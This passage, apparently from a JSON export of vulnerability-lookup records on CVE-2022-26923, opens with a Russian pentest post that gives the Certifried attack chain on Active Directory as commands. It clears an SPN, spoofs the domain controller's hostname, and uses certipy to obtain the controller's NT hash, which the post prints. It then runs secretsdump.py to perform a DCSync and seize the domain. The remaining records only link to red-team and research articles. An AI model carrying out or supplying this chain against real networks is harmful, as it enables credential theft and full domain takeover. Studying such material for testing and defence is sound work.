Machine\n\ncertipy auth -pfx testpc.pfx\n\u0414\u0430\u043b\u0435\u0435 \u0437\u0430\u0445\u043e\u0434\u0438\u043c \u043d\u0430 \u043b\u044e\u0431\u043e\u0439 \u0445\u043e\u0441\u0442 \u0434\u043e\u043c\u0435\u043d\u0430 \u0438 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u043c \u043c\u0435\u043d\u044f\u0442\u044c SPN \u0443 \u0437\u0430\u043f\u0438\u0441\u0438 \u043d\u0430\u0448\u0435\u0433\u043e \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430:\nGet-ADComputer TESTPC -properties dnshostname,serviceprincipalname\nSet-ADComputer TESTPC -DnsHostName DC.domain.local # \u0432\u0435\u0440\u043d\u0451\u0442 \u043e\u0448\u0438\u0431\u043a\u0443 \u0438\u0437-\u0437\u0430 \u0434\u0443\u0431\u043b\u0438\u0440\u0443\u044e\u0449\u0435\u0439\u0441\u044f SPN\nSet-ADComputer TESTPC -ServicePrincipalName @{} # \u043e\u0431\u043d\u0443\u043b\u044f\u0435\u043c SPN\nSet-ADComputer TESTPC -DnsHostName DC.domain.local\n\u0412\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u043c\u0441\u044f \u043d\u0430 
\u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439 \u0445\u043e\u0441\u0442 \u0438 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c \u043d\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442:\ncertipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine\n\u0410\u0432\u0442\u043e\u0440\u0438\u0437\u0443\u0435\u043c\u0441\u044f \u0441 \u043f\u043e\u043b\u0447\u0435\u043d\u043d\u044b\u043c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u043c \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c NTLM \u0445\u044d\u0448 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430:\ncertipy auth -pfx dc.pfx\n...\n[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733\n\u0414\u0430\u043b\u0435\u0435 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u043c \u0430\u0442\u0430\u043a\u0443 DCSync \u043b\u044e\u0431\u044b\u043c \u0443\u0434\u043e\u0431\u043d\u044b\u043c \u0434\u043b\u044f \u043d\u0430\u0441 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u043c \u0438 \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0435\u043c \u0434\u043e\u043c\u0435\u043d:\nsecretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt\n\u0412\u0435\u043a\u0442\u043e\u0440 \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0442\u043e\u043b\u044c\u043a\u043e \u0432 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0439 \u043a CVE-2022-26923 \u0441\u0440\u0435\u0434\u0435 Active Directory, \u043d\u043e \u0435\u0441\u043b\u0438 \u0432\u044b \u0432 \u043d\u0435\u0439 \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c, \u0442\u043e \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c 
\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0431\u0443\u0434\u0435\u0442 \u0442\u0430\u043a \u0436\u0435 \u043f\u0440\u043e\u0441\u0442\u043e, \u043a\u0430\u043a, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0435\u0439 ZeroLogon!\ud83d\udd3a\n#\u043f\u0435\u043d\u0442\u0435\u0441\u0442 #AD", "creation_timestamp": "2024-01-12T16:11:38.000000Z"}, {"uuid": "b0a97dfc-fb20-4ea0-9841-6f091c2fd0d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/6131", "content": "#Red_Team_Tactics\n1. Abusing CVE-2022-26923 through SOCKS5 on a Mythic C2 agent\nhttps://macrosec.tech/index.php/2022/06/01/abusing-cve-2022-26923-through-socks5-on-a-mythic-c2-agent\n2. Quantum Insert: bypassing IP\u00a0restrictions\nhttps://diablohorn.com/2017/05/21/quantum-insert-bypassing-ip-restrictions", "creation_timestamp": "2022-06-04T13:40:38.000000Z"}, {"uuid": "9e02bd9d-73b1-4587-af87-1c51bcf2437d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/5987", "content": "#Threat_Research\n1. BPFDoor - An Evasive Linux Backdoor Technical Analysis\nhttps://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis\n2. Active Directory Domain Privilege Escalation (CVE-2022-26923)\nhttps://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4", "creation_timestamp": "2022-05-12T11:01:01.000000Z"}]}